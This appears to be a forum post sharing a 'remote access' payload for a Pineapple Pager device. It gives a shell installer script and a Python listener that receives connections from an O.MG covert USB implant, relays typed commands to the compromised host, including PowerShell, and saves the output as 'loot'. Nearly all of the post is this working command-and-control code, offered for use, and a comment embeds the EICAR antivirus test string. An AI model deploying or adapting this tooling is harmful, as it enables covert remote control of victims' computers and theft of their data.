01-09-2026, 10:56 PM
There are many forms of remote access which may be used by different actors for various purposes. A red team may use remote access techniques that provide persistent access to an exploited target for the purposes of reconnaissance and lateral movement across the network. A systems administrator may use remote access to perform day to day operations on a network accessible computer. An array of techniques exist to obtain and maintain remote access across a network, including using a command and control server such as Cloud C². Common remote access techniques include reverse shells and may employ obfuscation techniques to mask the connection. See all remote access payloads. FOR THIS YOU NEED A PINEAPPLE PAGER
payload.sh
stealthlink-client-pager.py
payload.sh
Code:
REQUIRED_PACKAGES=(python3 tmux)
for pkg in "${REQUIRED_PACKAGES[@]}"; do
if ! opkg list-installed | grep -q "^$pkg "; then
LOG "$pkg is not installed. Prompting user to confirm installation..."
resp=$(CONFIRMATION_DIALOG "$pkg is required. Install it?")
case $? in
$DUCKYSCRIPT_REJECTED)
LOG "Dialog rejected"
exit 1
;;
$DUCKYSCRIPT_ERROR)
LOG "An error occurred"
exit 1
;;
esac
case "$resp" in
$DUCKYSCRIPT_USER_CONFIRMED)
LOG "User confirmed $pkg installation. Proceeding..."
;;
$DUCKYSCRIPT_USER_DENIED)
LOG "User denied $pkg installation. Exiting."
exit 1
;;
*)
LOG "Unknown response: $resp. Exiting."
exit 1
;;
esac
LOG "Installing $pkg..."
opkg update
opkg install $pkg || {
ERROR_DIALOG "Failed to install $pkg. Exiting."
exit 1
}
LOG "$pkg installed successfully."
else
LOG "$pkg is already installed."
fi
done
# Start the HIDX Stealthlink Client in a named tmux session
SESSION="hidx"
if tmux has-session -t "$SESSION" 2>/dev/null; then
LOG yellow "Stealthlink client is already running in tmux session '$SESSION'.\n\nTo attach (SSH): tmux a -t $SESSION\nTo stop: kill the tmux session (tmux kill-session -t $SESSION)\n\nLogs are in /root/loot/"
exit 0
fi
LOG "Starting HIDX Stealthlink Client in tmux session '$SESSION'..."
tmux new-session -d -s "$SESSION" 'python3 ./stealthlink-client-pager.py 0.0.0.0 1234'
if tmux has-session -t "$SESSION" 2>/dev/null; then
LOG green "Stealthlink client started!\n\nTo attach (SSH): tmux a -t $SESSION\nTo stop: kill the tmux session (tmux kill-session -t $SESSION)\n\nLogs are in /root/loot/"
else
ERROR_DIALOG "Failed to start Stealthlink client in tmux session."
exit 1
fistealthlink-client-pager.py
Code:
import os
import sys
import socket
import select
import logging
import binascii
import argparse
import threading
from datetime import datetime
from time import sleep
from pprint import pprint
# X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
## These can be set but aren't meant to be changed regularly.
remote_prompt = True # Assume that prompt gets received from host - Set to true for Powershell usage
nowait = True # wait or not wait for end of message control characters
delay = None # delay between messages (0.2-0.5 is fine) default to None
windows = False # enable larger buffer, ONLY meant for testing!
def non_blocking_input(prompt="", timeout=5):
print(prompt, end='', flush=True)
rlist, _, _ = select.select([sys.stdin], [], [], timeout)
if rlist:
return sys.stdin.readline().strip()
else:
return None
def pad_input(input_str, left_pad=False, right_pad=False, chunk_size = 8):
if left_pad and right_pad:
raise Exception("[!]Cannot add padding on both the left and right side!")
# default to right pad
if not left_pad and not right_pad:
right_pad = True
padding_length = (chunk_size - (len(input_str) % chunk_size)) % chunk_size
padded_str = None
if isinstance(input_str, bytes):
input_str = input_str.decode("utf-8")
if right_pad:
padded_str = input_str + ' ' * padding_length
if left_pad:
padded_str = ' ' * padding_length + input_str
return padded_str
def split_output(message,chunk_size=8):
chunks = []
for i in range(0,len(message),chunk_size):
raw_message = message[i:i+chunk_size]
padded_message = pad_input(raw_message,right_pad=True)
chunks.append(padded_message)
return chunks
def recvlog(msg):
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(f"{msg}",end="")
logger_received.info(msg)
logger_combined.info(f"[{timestamp}] [RECV] {msg}")
def handle_client(client_socket,run,rts):
global nowait
no_data_count = 0
while run.is_set():
data = None
try:
data = client_socket.recv(1024).decode()
except OSError as e:
run.clear()
print(f"[!]Socket Exception: {e}")
break
# double check the data
if not data:
recvlog("[!]Socket has disconnected....")
client_socket.shutdown(socket.SHUT_RDWR)
client_socket.close()
run.clear()
break
else:
if "\x07\x17" in data or nowait:
rts.set()
elif "SH" in data:
data = data.strip("\n")
rts.set()
elif data == "" and no_data_count>=2:
rts.set()
#print("Status: %s"%str(rts.is_set()))
recvlog(f"{data}")
def console_input(client_socket,run,rts, server_socket = None):
global nowait, windows, delay, remote_prompt
print("\nHIDX StealthLink Universal Client (type '%quit' to exit)")
debug_send = False
split_messages = True
while run.is_set():
if rts.is_set():
prompt_msg = "\r$"
user_input = ""
if debug_send:
dt = datetime.now().strftime("%M:%S.%f")
user_input = f"CLI {dt}"
else:
if remote_prompt:
prompt_msg = ""
print(prompt_msg, end='', flush=True)
user_input = input()
if not user_input:
continue
if user_input == "%exit" or "%quit" in user_input:
if server_socket:
server_socket.settimeout(1)
#client_socket.shutdown()
client_socket.close()
run.clear()
break
try:
raw_input = user_input + "\n\x07\x17\00"
if windows:
raw_input =pad_input(raw_input,right_pad=True,chunk_size=64)
if logger_combined:
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
logger_combined.info(f"[{timestamp}] [SEND] {raw_input}")
output = None
if split_messages:
output = split_output(raw_input)
for m in output:
client_socket.sendall(m.encode())
if delay:
sleep(float(delay))
else:
output = raw_input.encode()
client_socket.sendall(output)
if not nowait:
rts.clear()
except OSError as e:
print(f"[!]Socket Exception: {e}")
run.clear()
#client_socket.shutdown()
client_socket.close()
break
def hidxcli(host, port,reuse=True):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if reuse:
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
run = threading.Event()
run.set()
rts = threading.Event()
rts.set()
try:
server_socket.bind((host, port))
server_socket.listen(1)
server_socket.settimeout(1)
print(f"[*]Server listening on {host}:{port}")
while run.is_set():
client_socket,addr = None,None
try:
client_socket, addr = server_socket.accept()
recvlog(f"[+]O.MG Device connected from {addr[0]}:{addr[1]}")
os.system(f"ALERT 'StealthLink: O.MG Device connected from {addr[0]}'")
rts.set()
except socket.timeout:
pass
if client_socket:
client_thread = threading.Thread(target=handle_client, args=(client_socket,run,rts,))
client_thread.start()
console_thread = threading.Thread(target=console_input, args=(client_socket,run,rts,server_socket,))
console_thread.start()
finally:
print("[?]Attempting to close..")
os.system("ALERT 'Stealthlink: O.MG Device Disconnected and/or Listener shutting down'")
try:
server_socket.shutdown(socket.SHUT_RDWR)
except:
pass
server_socket.close()
exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Client")
parser.add_argument("host", type=str, nargs="?", default="0.0.0.0", help="address to bind to")
parser.add_argument("port", type=int, nargs="?", default=1234, help="port to listen on")
parser.add_argument("sendlog", type=str, nargs="?", help="message send log")
parser.add_argument("recvlog", type=str, nargs="?", help="message receive log (for loot)")
args = parser.parse_args()
# Create /root/loot directory if it doesn't exist
loot_dir = "/root/loot/stealthlink"
os.makedirs(loot_dir, exist_ok=True)
# Generate timestamped log filenames for this session
session_timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
default_recvlog = os.path.join(loot_dir, f"stealthlink-recv-{session_timestamp}.log")
default_combinedlog = os.path.join(loot_dir, f"stealthlink-combined-{session_timestamp}.log")
recvlog_path = args.recvlog if args.recvlog else default_recvlog
combinedlog_path = args.sendlog if args.sendlog else default_combinedlog
global logger_received, logger_combined
# Create formatter that only outputs the message (we add our own timestamps)
formatter = logging.Formatter('%(message)s')
logger_received = logging.getLogger("received_data")
recv_handler = logging.FileHandler(recvlog_path)
recv_handler.setFormatter(formatter)
logger_received.addHandler(recv_handler)
logger_received.setLevel(logging.INFO)
logger_combined = logging.getLogger("combined_data")
combined_handler = logging.FileHandler(combinedlog_path)
combined_handler.setFormatter(formatter)
logger_combined.addHandler(combined_handler)
logger_combined.setLevel(logging.INFO)
print(f"[*] Logs will be saved to:")
print(f"[*] Received: {recvlog_path}")
print(f"[*] Combined: {combinedlog_path}")
hidxcli(args.host, args.port)